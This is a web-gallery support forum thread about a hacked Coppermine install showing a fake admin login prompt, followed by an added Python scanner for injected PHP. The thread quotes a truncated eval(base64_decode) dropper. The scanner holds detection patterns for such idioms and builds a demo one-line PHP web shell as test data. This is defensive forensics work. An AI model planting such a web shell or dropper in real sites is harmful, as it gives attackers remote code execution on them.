forum.coppermine-gallery.net

Support => cpg1.4.x Support => Older/other versions => cpg1.4 miscellaneous => Topic started by: sandramichelle on November 27, 2008, 02:27:17 am

Title: Authenticate?
Post by: sandramichelle on November 27, 2008, 02:27:17 am
When trying to change some configuration settings, I click on "save new configuration" and come to a screen that says "Authenticate" with a box for user name and password.  I put mine in, and it goes back to my home page and the changes have not been made.

Can anyone help me with fixing this, please?  I have looked through the forum but if this was touched on in a prior post, I couldn't locate it.

Thanks!
Title: Re: Authenticate?
Post by: Nibbler on November 27, 2008, 04:55:14 am
Can you post a screenshot of this? Doesn't sound like part of Coppermine to me.
Title: Re: Authenticate?
Post by: lumo on November 29, 2008, 03:15:33 pm
Hi, I've had the same problem since today!

Yesterday, I didn't see my Captcha image anymore. I disabled Captcha via PHPAdmin in order to be able to log in. Then I removed Captcha with the Coppermine plugin manager. Now, when trying to make changes to my Coppermine settings, this "Authenticate" screen appears. And no changes are accepted.
Screenshot: http://www.file-upload.net/view-1284131/authenticate.gif.html

Please help!

lumo

Title: Re: Authenticate?
Post by: lumo on November 29, 2008, 03:19:59 pm
Screen after pressing the submit button on the authenticate screen:
Screenshot: http://www.file-upload.net/view-1284145/authenticate2.gif.html

lumo
Title: Re: Authenticate?
Post by: Nibbler on November 29, 2008, 03:36:28 pm
Can you zip up your admin.php and attach it to this thread please. Is your gallery up to date?
Title: Re: Authenticate?
Post by: lumo on November 29, 2008, 03:53:04 pm
I've just updated to the latest version.

Here's the admin.php:

http://www.file-upload.net/download-1284208/adminphp.zip.html

btw: How can I edit posts?

greetings
lumo

Title: Re: Authenticate?
Post by: Nibbler on November 29, 2008, 04:00:53 pm
You can't edit posts. Please attach files to the thread instead of using some other website.

I wanted the version of admin.php that gives you this 'authenticate' box not the clean 1.4.19 version.
Title: Re: Authenticate?
Post by: lumo on November 29, 2008, 04:19:29 pm
Sorry, I'm new here. This is the admin.php I downloaded from my Coppermine directory. Are there different admin.php files in the directory?

How can I attach a file properly?

Cheers  ;)
lumo
Title: Re: Authenticate?
Post by: lumo on November 29, 2008, 04:28:55 pm
Okay, I found out how to attach.

lumo
Title: Re: Authenticate?
Post by: lumo on November 29, 2008, 09:03:35 pm
Hi Nibbler,

any idea what's the problem here?

Greetings
lumo
Title: Re: Authenticate?
Post by: Nibbler on November 29, 2008, 09:13:28 pm
The attached file is the 1.4.19 version again. Do you actually have the original?

Could be some other script interfering (possibly accidentally), or a hack to steal admin passwords.
Title: Re: Authenticate?
Post by: lumo on November 29, 2008, 09:58:07 pm
So then, would it be better to set up a whole new gallery and delete the old one, that is, make a new install rather than an update?

Concerning the admin.php, as I told you, I downloaded it directly from the coppermine folder (cpg148) on my webspace. I made the update to version 1.4.19 yesterday. So why are you astonished about the admin.php version?

I guess this is the only admin.php file which should be situated in the cpgxxx directory, isn't it?

lumo
Title: Re: Authenticate?
Post by: Joachim Müller on November 29, 2008, 10:33:45 pm
You have probably been hacked before performing the upgrade - your issues sound familiar: read up on http://forum.coppermine-gallery.net/index.php/topic,56516.msg276234.html#msg276234 - the user there reported the very same thing.
Please note that upgrading a gallery that already was hacked won't make the hack go away - you have to sanitize your entire webspace.
Title: Re: Authenticate?
Post by: lumo on November 29, 2008, 11:54:38 pm
Hello Joachim, thanks for the hint. I'm going to make a backup of my htdocs first.
I can't put the gallery into maintenance mode because I can't change anything. I think I'll rebuild everything from scratch.

Hi Joachim, thanks for your hint. First, I'm going to make a backup of my htdoc files. I can't set the gallery into maintenance mode because of the (assumed) hack. I think I'll need to rebuild everything.  :'(

lumo
Title: Re: Authenticate?
Post by: Joachim Müller on November 30, 2008, 09:35:24 am
It doesn't hurt if you can't put the gallery into maintenance mode. Skip that step from the sanitization instructions - it is only meant to make sure that the content of your gallery doesn't change during sanitization because of users uploading images. Starting from scratch will not automatically sanitize your webspace. The attacker may have left behind a backdoor somewhere outside of the coppermine folder. I strongly suggest that you sanitize as suggested. Only English please on this part of the forum.
Title: Re: Authenticate?
Post by: lumo on November 30, 2008, 12:32:24 pm
May I post my first results of sanitization?
Code:
<? /**/eval(base64_decode('aWY
Code:
<?php
// Coppermine configuration file

// MySQL configuration
$CONFIG['dbserver'] =     'xxx';   // Your database server
$CONFIG['dbuser'] =       'xxx';   // Your mysql username
$CONFIG['dbpass'] =       'xxx';   // Your mysql password
$CONFIG['dbname'] =       'xxx';   // Your mysql database name

// MySQL TABLE NAMES PREFIX
$CONFIG['TABLE_PREFIX'] = 'xxxx';
?>

Would anyone be so kind (I know well that you are all very busy) and analyze the content of the messy config.inc.php in order to find out, what it does?

I'll continue, if I may.

Yours
lumo
Title: Re: Authenticate?
Post by: lumo on November 30, 2008, 12:44:05 pm
I forgot one thing:

In the /include folder, "install.lock" was not empty. It contained the text "locked".
Title: Re: Authenticate?
Post by: lumo on November 30, 2008, 01:27:25 pm
Report continued:


Result: "Authenticate" screen still appears. Damn!

Then I did the following:

As I knew I had no plugins installed, but there were a lot of them (uninstalled ones) in my plugins folder (don't ask me how or when I got them ...), I decided to remove all of them.


So how to continue now?

Yours
lumo
Title: Re: Authenticate?
Post by: lumo on November 30, 2008, 04:35:19 pm
Note:
Also the file "themes.php" in my customized "gray satin" theme was affected. At the beginning of the file, I found some code that should not be there. I replaced the file with an original version of "themes.php". Are you interested in the code that was smuggled in? Tell me, and I'll post a screenshot.

Thank you very much, Joachim!
Title: Re: Authenticate?
Post by: Joachim Müller on November 30, 2008, 11:50:48 pm
No thanks, the payload is unimportant for us, as it may differ on the next attack.
Title: Re: Authenticate?
Post by: lumo on December 01, 2008, 08:37:13 am
Ok. I wonder what thread opener sandramichelle found out - btw, sorry for kind of hijacking your thread!  ;)
Title: Re: Authenticate?
Post by: Hein Traag on December 01, 2008, 09:22:58 am
As Joachim said, that is not important. What is more important is given in the threads on how to deal with a hack.
Title: Re: Authenticate?
Post by: Joachim Müller on December 01, 2008, 09:48:38 am
Hack forensics (i.e. analyzing the payload of a hack and drawing conclusions from that) is something that only very skilled people with a security background can accomplish. In fact you need to be a hacker to understand a hacker. It doesn't make sense for you as website owner to waste time and energy finding out what a malicious script has done unless you're skilled enough to read the malicious script and understand where to look in particular. However, this approach has a flaw: analyzing the one payload file you found to figure out what the attacker did might make you ignore other backdoors or payload files. For a thorough sanitization, you can not just review the payload file: you need to sanitize your entire webspace.

If you're really concerned, ask your webhost for support. The reason for that: in the past, malicious attacks have been run against entire web servers with hundreds of shared webhosting accounts on them. If the webhost had a flaw in the mechanisms that are supposed to shield the separate accounts from each other, one infected account was enough to infect the entire server, including areas that you as a user on that shared webhosting server can't even access (root-only areas). Therefore, it's always a good idea to contact your webhost and confess that you have been hacked, even if it was you who is to blame because of reluctance to update your apps. The webhost should be informed anyway - a good webhost will take this seriously and at least perform some sort of security scan or audit just to make sure the entire web server wasn't hacked along as well.

I can understand that you are concerned and excited and want to use all resources available (including this board) that will help you bring your webspace back to a normal level. However, as in previous incidents, there's no use in ranting: as far as we're concerned, we can only provide the most recent fixes in a timely manner - the rest is up to you. Think of the Yikes-thread as a courtesy that actually is beyond what you can expect from regular support boards. You definitely can't expect an analysis of the payload that was uploaded to your webserver because of your reluctance to upgrade in a timely manner. It's quite natural to try to blame others for mistakes, but you have to face the truth: it's your task to keep your website clean and up to date.

Joachim
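Two things the thread asks for by hand can be scripted: Nibbler compares the posted admin.php against the clean 1.4.19 file, and Joachim's point is that one injected file (here the `<? /**/eval(base64_decode(...` prefix in config.inc.php and the code prepended to the theme file) is never the whole story, so the entire webspace has to be checked. The scanner below is an added example, not code from the forum thread or the Coppermine project. It walks a directory tree, flags PHP files that contain common injection idioms (eval of a decoder such as base64_decode/gzinflate/str_rot13, the `<? /**/eval(` prefix from the thread, eval of request data, the preg_replace /e modifier), and, when a clean reference copy of the application is available (e.g. the unpacked 1.4.19 archive), reports files whose SHA-256 differs from the reference and files that exist only in the webspace. The marker list, the directory layout and the sample file contents are constructed for this example; the placeholder payloads decode to a harmless `die();`.

```python
"""Scan a PHP webspace for injected code and for files that differ from a clean copy.

Added example for the Coppermine 'Authenticate' thread; not the project's own code.
Marker regexes are an assumption about common droppers, not an authoritative signature set.
"""
import hashlib
import os
import re
import tempfile

# Idioms an injected PHP dropper commonly uses.  Hits need manual review: a legitimate
# file may use base64_decode, but eval() of its result almost never belongs in an app.
SUSPICIOUS = {
    "eval-of-decoder": re.compile(rb"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("),
    "short-tag-comment-eval": re.compile(rb"<\?\s*/\*\*/\s*eval"),   # prefix seen in the thread
    "eval-of-request": re.compile(rb"(?:eval|assert)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b"),
    "preg_replace-e-modifier": re.compile(rb"preg_replace\s*\(\s*['\"]/[^'\"]*/[a-z]*e[a-z]*['\"]"),
}

PHP_EXTENSIONS = (".php", ".inc", ".phtml", ".php5")


def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_for_markers(root: str) -> dict:
    """Return {relative path: [marker names]} for PHP files containing a suspicious idiom."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXTENSIONS):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "rb") as f:
                data = f.read()
            found = [label for label, rx in SUSPICIOUS.items() if rx.search(data)]
            if found:
                hits[os.path.relpath(full, root)] = found
    return hits


def diff_against_reference(webspace: str, reference: str) -> dict:
    """Compare every file under `webspace` with the clean `reference` tree by SHA-256.

    'modified' = same path, different content (config.inc.php will legitimately show up here,
    the operator decides); 'extra' = only in the webspace (uploaded backdoors land here);
    'missing' = only in the reference.
    """
    def tree(root):
        out = {}
        for dirpath, _, files in os.walk(root):
            for name in files:
                full = os.path.join(dirpath, name)
                out[os.path.relpath(full, root)] = sha256_of(full)
        return out

    web, ref = tree(webspace), tree(reference)
    return {
        "modified": sorted(p for p in web if p in ref and web[p] != ref[p]),
        "extra": sorted(p for p in web if p not in ref),
        "missing": sorted(p for p in ref if p not in web),
    }


def _write(path: str, data: bytes) -> None:
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(data)


def build_demo() -> tuple:
    """Construct a clean reference tree and a hacked webspace (sample data, not real files)."""
    base = tempfile.mkdtemp(prefix="cpg-scan-")
    ref, web = os.path.join(base, "reference"), os.path.join(base, "webspace")
    clean = {
        "include/config.inc.php": b"<?php\n$CONFIG['dbserver'] = 'localhost';\n?>\n",
        "themes/gray_satin/theme.php": b"<?php\nfunction theme_main_menu() {}\n",
        "admin.php": b"<?php\ndefine('IN_COPPERMINE', true);\n",
    }
    for rel, body in clean.items():
        _write(os.path.join(ref, rel), body)
    hacked = dict(clean)
    # Dropper prepended to the config file; 'ZGllKCk7' is base64 for "die();" (harmless placeholder).
    hacked["include/config.inc.php"] = (b"<? /**/eval(base64_decode('ZGllKCk7')); ?>\n"
                                        + clean["include/config.inc.php"])
    # Dropper prepended to the theme file; 'qvr();' is rot13 for "die();".
    hacked["themes/gray_satin/theme.php"] = (b"<?php eval(str_rot13('qvr();')); ?>\n"
                                             + clean["themes/gray_satin/theme.php"])
    # A web shell dropped into an upload directory, absent from the reference tree.
    hacked["albums/userpics/.cache.php"] = b"<?php if (isset($_POST['c'])) { eval($_POST['c']); } ?>\n"
    for rel, body in hacked.items():
        _write(os.path.join(web, rel), body)
    return web, ref


if __name__ == "__main__":
    web, ref = build_demo()
    for path, markers in scan_for_markers(web).items():
        print(f"SUSPICIOUS {path}: {', '.join(markers)}")
    for kind, paths in diff_against_reference(web, ref).items():
        for p in paths:
            print(f"{kind.upper():9}{p}")
```

Run it against the real site as `scan_for_markers("/path/to/htdocs")` and `diff_against_reference("/path/to/htdocs", "/path/to/unpacked-cpg1.4.19")`. The hash diff only covers paths that exist in the reference, so a backdoor outside the Coppermine folder, in .htaccess, or appended to an image file shows up only as 'extra' or not at all; that is the gap Joachim's advice closes by sanitizing the whole webspace and informing the host rather than trusting any single scan.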